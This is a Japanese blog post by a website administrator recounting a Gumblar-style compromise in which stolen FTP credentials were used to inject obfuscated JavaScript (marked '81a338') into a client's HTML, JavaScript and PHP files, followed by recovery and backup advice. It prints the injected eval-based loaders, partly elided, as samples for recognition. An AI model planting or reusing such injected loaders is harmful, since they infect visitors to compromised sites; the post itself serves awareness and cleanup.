WEBサイト改ざん被害

メルです。

かなり仕事を休んでしまったので
「さぁ、仕事!仕事!」と思いきや、
管理しているある企業のサーバーに
不振なFTPアクセスが・・・

アクセス元は、

など・・・。

これはやばいのでは?と思いながら
サーバーの中身を見ると、
なんと大量のファイルが改ざんにあっているではありませんか。

改竄されたページにアクセスすると訪問者のパソコンが
感染し、被害が広まると言うオマケ付き。

改竄されたファイルは、HTMLファイル、JavaScriptファイル、
一部PHPファイルで、<!–81a338–>、/*81a338*/から始まる
JavaScript、iframe などの埋め込みが特徴。

他にも81a338の代わりに0c0896や、ded509などの6桁の
英数字のものもあるようです。

状況から見て、
これは最近非常に被害が増えているパターンで
ガンブラーなどのウイルスやスパイウエアに感染し、
パソコンからFTP情報を搾取され、改竄されている
可能性が高い。

 

 

流石にこれはまずいので、
サイトを閉鎖し、クライアント企業に連絡。

全てのパソコンのウイルスチェックをしてもらい、
サーバー、FTPへのアクセス制限を行い、
全てのパスワードの変更と共に復旧作業に取り掛かることに。

因みに改ざん被害にあったファイルには以下のコードが追加されていました。

 

改ざんされたHTMLファイル

<!--81a338--><script type="text/javascript" language="javascript" >gakqf="s"+"p"+"li"+"t";srkjb=window;fpr="dy";txm=document;rcigwm="0x";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv="17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:58:5c:17:34:17:5b:66:5a:6c
     ・
     ・中略
     ・
5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:58:5c:27:30:1f:20:32:4:1:74:4:1:74"[gakqf](":");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String["fromCharCode"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script><!--/81a338-->

 

改ざんされたJavaScriptファイル

/*81a338*/
ragir="s"+"p"+"li"+"t";negu=window;zwh="dy";vqpoo=document;rauffm="0x";blye=(5-3-1);try{++(vqpoo.body)}catch(xdomas){jioz=false;try{}catch(dhncm){jioz=21;}
if(1){przkl="17:5d:6c:65:5a:6b:60:66:65:17:60:5d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:
     ・
     ・中略
     ・
2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5d:27:30:1f:20:32:4:1:74:4:1:74"[ragir](":");}negu=przkl;ljy=[];for(cahkv=22-20-2;-cahkv+1374!=0;cahkv+=1){lufim=cahkv;if((0x19==031))ljy+=String["fromCharCode"](eval(rauffm+negu[1*lufim])+0xa-blye);}klc=eval;klc(ljy)}
/*/81a338*/

 

改ざんされたPHPファイル

#81a338#
if(empty($qk)) {
$qk = "<script type=\"text/javascript\" language=\"javascript\" >gakqf=\"s\"+\"p\"+\"li\"+\"t\";srkjb=window;fpr=\"dy\";txm=document;rcigwm=\"0x\";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:
     ・
     ・中略
     ・
4:1:74:4:1:74\"[gakqf](\":\");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String[\"fromCharCode\"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script>";
echo $qk;
}
#/81a338#

 

このサーバーには月商300万円のネットショップが入っていたので
スピード勝負。

結局なんだかんだで復旧までに丸1日かかってしまいましたが(笑

最近、CMSなどの脆弱性をついた攻撃や、
今回のようにパソコンから情報を搾取しての攻撃など、
非常に被害が広まっています。

またWEBサイトにアクセスするだけでも感染するものも
多数あります。

どこか遠い世界の出来事ではなく、
誰もがいつでも感染する可能性があります。

パソコンのセキュリティはしっかりと導入し、
まめにスキャンして、皆さんも気をつけて下さい。

 

 

— 10/3追記 —

 

このタイプの被害にあった場合の対処法は、
81a338で入れ子になっている部分の記述を削除するしかありません。

被害にあっている事に気付くのが遅いと、
数百から数千ものファイルが書き換えられているため、
手動でファイルを開いて削除していたら大変です。
日頃からサーバー内の全ファイルのバックアップを
まめに取っておく事をお勧めします。

バックアップさえあれば、FTPで一括上書きアップロードで対応できます。

 

 

この投稿は役に立ちましたか? 役に立った 役に立たなかった

 

ネットビジネス速報メールマガジン

 

メルのネットビジネス速報では、悪質高額塾などの被害が拡大しないように
新しい悪質販売者の情報が入り次第、速報でお伝えいたします。

Dreamweaver、Fireworks、PhotoshopなどのTipsやチュートリアルの紹介、
最新SEO情報、その他ネットビジネスに関する情報をいち早く配信しています。

お名前(必須)
メールアドレス(必須)

One Response to “WEBサイト改ざん被害”

  1. […] これは前回、WEBサイト改ざん被害の記事でも書きかましたが、 管理しているパソコンからFTPのパスワードを抜き取られて改竄されます。 […]

記事「WEBサイト改ざん被害」にコメントを残す

サブコンテンツ

危険な高額塾

タグ

株式会社WINGOOD Login LockDown スタイルシート 情報商材 中山秀人 タイガーウイング iphone ブルートフォースアタック インペリアルゴールド 株式会社バンザイ 配布 スクロール リンクシェイカー アイコン Youtube DTD クラック 石井匠 Google Maps API moza パズル KMSpico 株式会社SRシステム ネットショップ force puzzle 立体 がら空きビジネス タスクバー ツール ネットゲーム Tiger-Wing Cash on Wordpress google 固定ページ トラフィック Wordpress Content Slide 自動化 サンタ フォローマティック postpost 自己アフィリ バイマ ネオヒルズアカデミー レビュー 短縮URLツール 大園転売塾 レイアウト崩れ 無断送信 Chrome エクスプローラー レタープレス IBS サイト改ざん Baidu system 到達率 感染 エクスチェンジ 自動 高速ゲーム 不労所得の神 android ムーバブルタイプ フレンドシップメール RSS マイクロソフト .htaccess SKナレッジ トレンドキーワード ツイッター クリックランキング 定型文 ビジネス カスタマイズ 詐欺 切抜き ネットビジネス最後の楽園 秀吉塾天下統一 山下 北川 雅嗣 ワードプレス 株式会社A-ブログレス BBIZ ブラクラ デスクトップ 小笠原健一 RSS Includes Pages 不正送信 量産 MT getElementById プラグイン 比較 tool functions.php プロモーション Windows 7 スムーズ エキスパートメール バナー MovableTYpe 画像 ファビコン LinkShaker Yahoo EC YouTube Maniax 2017 document.all クラウド変換 高額塾 伊藤塾 Diamond Affiliate Masters Program ぼかし 特権ビジネス トレンドアフィリエイト 特定のメールアドレス High Concept Marketing シャンプー 復元 優先順位 改ざん 久積篤史 explorer 切り抜き ネットビジネス大全集 株式会社Free Agent Style 管理画面 FireWorks BUYMA SyntaxHighlighter 新井浩 ヤフー 加藤 秀吉 出店料 原田真 ping送信 もざ CS6 Line Ban Hammer JavaScript 伊藤 虎太郎 メルマガ配信システム アクセス制限 DOCTYPE SEO 背景 ウインドウ ウイルス 不正アクセス ネットガレージ 関根義光 ソースコード アクセスアップ 自己アフィリエイト 副業術 テンプレート アンダーグラウンドアフィリエイトクラブ 加工 HTML4.0 テーマ 球体 掲示板 音量アイコン アフィリエイト wordpress 流出 メモ getElementByTagName IE Thunderbird 個人情報流出 マルウエア 土屋ひろし ブロックポリシー 管理ツール セキュリティ FTP Adobe クラウド入力機能 ブロック 登録禁止 Agency Business インターネット IP アドセンス 百度 Favicon 大園式転売塾 wpXサーバー html ブラウザ 無料オファー ソース Windows 株式会社ニュース インターネットエクスプローラー レイアウト Firefox アレックス 株式会社SRシステム 大西良幸 81a338 権利収入 伊藤 歩 与沢翼 バックアップ ping 賢威 KMS認証 ライブチャット SmoothScroll.js followmatic CS5 人物 MasterCollection ユーチューブマニアクス2017 スマホ アフィ匠 ロリポップ office モザイク PPC コピーボタン 上位表示 表示 アンダーグラウンドメソッド 関根塾 ランキング 与沢翼×蝶乃舞 インターネットビジネススクール ボタン アレックス式ネオせどりスクール 個人情報 インフォトップ CGI ドメイン WP ブラシ css せどり ライン クロスアフィリエイト 脆弱性 やしろひろたみ 申請金ビジネス 秒速で1億円稼ぐ男 XHTML 滑らか 短縮URL ハート 転売大園塾 ネットビジネス RMT グラデーション ざくざく君 伊藤虎太郎 無料 村上省吾 プロファイル Google Maps @PAGES 既得権益 改竄 池田純矢 バイドゥー ライオンアフィリエイト 放射線 日本語入力変換ソフト 宮田麗花 Extension Manager 三橋美仁 WEB スカイプ wp-login.php ECサイト エディタ ヤフーショッピング レンタルサーバー ソフト PHP Internet Explorer ヤフオク 大園麗花 twitter 蝶乃舞 詐欺組織 マニュアル Newpost Catch やしろ塾

アーカイブ

エステトラブル

このページの先頭へ